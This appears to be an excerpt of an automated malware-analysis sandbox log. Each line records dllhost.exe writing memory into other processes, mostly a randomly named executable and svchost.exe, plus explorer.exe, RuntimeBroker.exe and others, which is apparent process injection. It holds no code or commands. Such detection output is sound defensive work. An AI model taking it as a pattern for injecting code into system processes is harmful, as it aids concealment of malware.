Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 5A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 10E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 980000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 620000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 8850000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 840000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 410000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 710000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 238EF1C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2CA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26CDA140000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 420000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: EC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: B60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1430000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 650000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 870000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 500000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 500000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 670000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 5A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 10E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 760000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 980000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 620000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 840000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 410000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E50000
